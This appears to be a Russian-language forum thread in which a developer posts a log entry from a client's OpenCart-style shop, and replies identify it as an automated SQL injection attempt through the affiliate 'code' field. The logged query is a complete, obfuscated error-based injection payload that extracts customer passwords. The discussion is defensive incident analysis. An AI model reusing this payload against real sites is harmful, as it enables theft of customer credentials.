Перейти к содержанию
pashast

Странные записи в логе ошибок

Рекомендуемые сообщения

Взял сайт клиента на доработку, а там куча подобных записей в логе

2017-01-09 7:02:41 - PHP Notice:  Error: Duplicate entry '!~!488f66ad1d22020293!~!1' for key 'group_key'<br />Error No: 1062<br />SELECT affiliate_id FROM `oc_affiliate` WHERE code = 'sk' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,ifnull(password,char(32)),0x217e21) /**/fRoM site.oc_customer /**/lImIt 744,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1' in

Может кто видел такое?

Похоже что кто-то пытался вытащить пароли

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

проверять сайт клиента на уязвимости

возможно, брешь в каком-то модуле

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Типичный запрос для автоматических средств эксплуатации mysql-i уязвимостей.

 

Дырка в запросе к таблице oc_affiliate.

Не достаточное экранирование для поля - code.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.